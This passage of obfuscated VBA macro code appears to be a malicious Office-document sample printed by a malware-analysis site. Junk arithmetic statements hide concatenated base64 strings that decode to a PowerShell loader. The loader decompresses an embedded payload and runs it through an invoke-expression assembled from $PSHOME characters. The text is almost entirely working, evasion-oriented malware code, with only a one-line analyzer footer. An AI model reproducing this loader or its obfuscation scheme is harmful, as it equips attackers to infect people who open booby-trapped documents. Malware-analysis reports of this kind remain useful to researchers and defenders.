EizGo = EOQrMPUBX + LCswI + svYFTozRol + oMWtXYmGvUQ + jFHjYEJsIqK
End Function
Function XRCNmBJF()
On Error Resume Next
XiNDA = Tan(11747)
ijpjv = jcrXwP
ciJtwl = CDbl(mXvmnn)
lovMw = PFAVYu
VlMHhR = Hex(ktYTGP * ChrW(TGkCvH + Int(wowKzi * Rnd(46323)) * doUBz * Log(19314 * KoFVE - sPcGh + Fix(51))))
vzQSd = Tan(75404)
lKJjz = "bg" + "Bq" + "ADkAN" + "gBXADYAZQ" + "BwAFgAQgA3AF" + "gAcAB1AG" + "sA" + "TQBOAHU" + "AUwBIA"
XwQwhm = Tan(22594)
PkwFP = SwwzZ
fGZUE = CDbl(UcXNW)
OJmFtr = jsBcf
ASucCT = Hex(EjKQW * ChrW(rPSiqC + Int(HqFdM * Rnd(4754)) * ZqLid * Log(88324 * DzazUu - nizVi + Fix(51))))
zHQJKa = Tan(33956)
PvRMjFRjkw = "CsAbAArAC8Ac" + "QB4AGU" + "AcABhAEMAb" + "AB2AHcANAA0AFcA" + "MgB" + "3AEgAZwBSAG" + "UATgBsAG4AZwBs"
KNQQA = Tan(26968)
NYfmcF = QsjWHM
MGHiF = CDbl(SZBUD)
UtmJjU = GZGTjF
LqYanS = Hex(CwGJl * ChrW(IcoWLj + Int(luijz * Rnd(4253)) * GvFmYY * Log(26312 * bBbjkX - vfzzY + Fix(51))))
dljIz = Tan(10233)
zBUDiiOGw = "AE4ARABo" + "AEMATABuAE4" + "ANABRA" + "EgAdA"
QMoal = Tan(82516)
GsUlNh = Amufw
SzzjBd = CDbl(cKWiY)
HiPNB = tYLCLO
rKdwod = Hex(bnRME * ChrW(InWwW + Int(MuZjlZ * Rnd(87780)) * EFHwoV * Log(33808 * tzLhBX - UMCIcm + Fix(51))))
BOjVB = Tan(79974)
BvOvduhhV = "BMAHYARAArAFg" + "AZAAwAG8AQwBzA" + "GwATgBjAHQA" + "RwBRAHMASQBmA" + "FMAbAA5ADEA" + "ZwBsAG" + "EA"
brZvs = Tan(93129)
fUYjH = uXlpo
DFWiRR = CDbl(zDtQTU)
USHmmI = UosiZV
Mdcrh = Hex(mLEII * ChrW(vwSmDF + Int(fCbPz * Rnd(5882)) * NjQdEr * Log(92580 * laQZmH - INziIN + Fix(51))))
BCoYKp = Tan(25552)
qjhkd = "bwBQAEEA" + "aAByADUATAB3AH" + "gAa" + "gBC" + "AE4AawBGAH"
NdoBwC = Tan(90834)
DQhNNs = iTHpu
QUuRl = CDbl(OofhGU)
MmlkI = NmvOaA
JjKFC = Hex(TWzIt * ChrW(NVhlYi + Int(sMjjti * Rnd(98171)) * hbVGU * Log(33169 * Yhiaf - BiOdr + Fix(51))))
vRfAX = Tan(61786)
pWlJocPtti = "UAcwB2AFY" + "AbgBNAG8AeQ" + "A4AHMA" + "MABUAHQAMgB" + "LA" + "FY"
IDcwQX = Tan(6511)
lubCYS = zzHzCV
hRGBhD = CDbl(BawaVI)
vkNCc = PknbT
DUjtZd = Hex(RVLqPp * ChrW(NkTdbD + Int(ZBOtv * Rnd(51181)) * aziii * Log(97854 * QUhYz - rzkuwN + Fix(51))))
uiQJzQ = Tan(48474)
dfJClHBW = "AWAB" + "6AGsARABIAGwAeA" + "BxAEsAeABB" + "AHE" + "AQgBlA" + "DYAUgBP"
XRCNmBJF = lKJjz + PvRMjFRjkw + zBUDiiOGw + BvOvduhhV + qjhkd + pWlJocPtti + dfJClHBW
End Function
Function NrYUMCBiddw()
On Error Resume Next
TSAiCO = Tan(82369)
jMjqw = QmEiKS
QUuhzU = CDbl(hUiSZW)
CjuuiA = DiRWi
OiEVFG = Hex(CzGwE * ChrW(uqLhOR + Int(wNGKkj * Rnd(34877)) * MmcKT * Log(43451 * CQJMSV - EZzpjF + Fix(51))))
sADFCw = Tan(1397)
FGAfno = "AEwATgA2AFgARA" + "BM" + "AHcAYQB" + "EAF" + "EAaQBvADY" + "AZABnA" + "GUAVQBRA" + "EgANAA4AC8A" + "JwApACAALABbA" + "GkAT"
ukZoz = Tan(80846)
dlkXN = vXCwGD
jMuwM = CDbl(UlZFR)
jiWYn = VFsvME
swwcB = Hex(vurrh * ChrW(ccjVaE + Int(TzjIZz * Rnd(28213)) * kwQkA * Log(81749 * UWXIYz - dpnoi + Fix(51))))
CojSr = Tan(61233)
YNBXh = "wAuAGMATwBNAFA" + "AcgB" + "FAFMAcw" + "BpAE8ATg" + "AuAGMATwBtAHA" + "AUgBFAHM" + "AUwBpAE8" + "AbgBNAE8AR" + "ABlAF0AOg"
LLnXdm = Tan(76180)
waHhz = HJzRji
WrVkQD = CDbl(vPwtU)
YJjAi = KKhPfH
TuilAK = Hex(npUSmN * ChrW(VOjbOM + Int(Swazmv * Rnd(47348)) * pbpdjk * Log(44417 * dziXR - oQORCo + Fix(51))))
AnRupA = Tan(92948)
PrJukUQN = "A6AEQ" + "AZQBDAE8AT" + "QBwAHIAZQBTA" + "FM" + "AKQAgA" + "HwAJQAgAHsAIA" + "Bu" + "AGUAVwAtAE8AY" + "gBqAGUAQ"
oOPYA = Tan(99024)
dJjwwz = ijpcj
KiVsk = CDbl(poYjrk)
MojSwR = wnFkEp
zJlENR = Hex(tFsXoK * ChrW(DEZpO + Int(kOvNq * Rnd(21340)) * NWdlnu * Log(86238 * fmiiSn - jqvKH + Fix(51))))
sifvqR = Tan(25008)
obYjA = "wB0ACAAI" + "ABpAG8" + "ALgBTAHQAU" + "gBlAGEATQByA" + "EUAYQBEAE" + "UAUgA" + "oACQAXwAsACAAW" + "wBzAHkAUwB" + "UAEUATQAuAFQAR"
NrYUMCBiddw = FGAfno + YNBXh + PrJukUQN + obYjA
End Function
Function ziHVi()
On Error Resume Next
NYNCSZ = Tan(44313)
HjtRSY = uKvkR
ERjEYU = CDbl(wpzdfJ)
ORczO = GjMRpH
Qkkvh = Hex(DJGhwt * ChrW(idRmQ + Int(JGDdiv * Rnd(42100)) * YVEPO * Log(32323 * XNFCv - FIHkiG + Fix(51))))
NcRaB = Tan(8561)
vzBdwlQ = "QB4AFQALgBFAE4" + "AYwBvAEQAaQBOAE" + "cAXQA6ADo" + "AYQBTAGMASQ" + "BJACkAfQ" + "AgACkALgBSAG" + "UAYQBkA"
NMGBzL = Tan(49447)
nCRjdF = QMkUA
wvtEp = CDbl(IvEiN)
RmKGD = kKZUF
udDBM = Hex(pjDuO * ChrW(NzKwR + Int(jXEZLS * Rnd(1003)) * Ihkpi * Log(57763 * bJMJGi - ojGWYt + Fix(51))))
Fsltpl = Tan(65473)
VPUmk = "FQATwBlAG4AZA" + "AoAC" + "AAKQB8" + "AC4AIAAoA" + "CAAJ" + "ABwAFMASABPA" + "G0ARQBbA"
URlBD = Tan(94119)
wNQka = ozoLBk
XTouGQ = CDbl(pwwps)
MouYE = BjksGn
GRuwi = Hex(AzrBdq * ChrW(nuSwRb + Int(SZzDQG * Rnd(44029)) * CmbhGo * Log(18610 * vBOBsJ - nQhKr + Fix(51))))
Olbiv = Tan(415)
hBcAiAWk = "DI" + "AMQBdACsAJ" + "ABQ" + "AHMASABPAE0A" + "ZQB" + "bA"
SqjcQR = Tan(93764)
ZvjGd = XwDaw
DLmiw = CDbl(boBADL)
cSEUmk = MROVwD
wrpXE = Hex(qcHEwf * ChrW(pIDZsY + Int(AqSbR * Rnd(79561)) * zmzRk * Log(85474 * dzLcw - zzLzW + Fix(51))))
zmDOo = Tan(54956)
jhisQ = "DMA" + "MABdAC" + "sAJwB4AC" + "cAKQA="
ziHVi = vzBdwlQ + VPUmk + hBcAiAWk + jhisQ
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.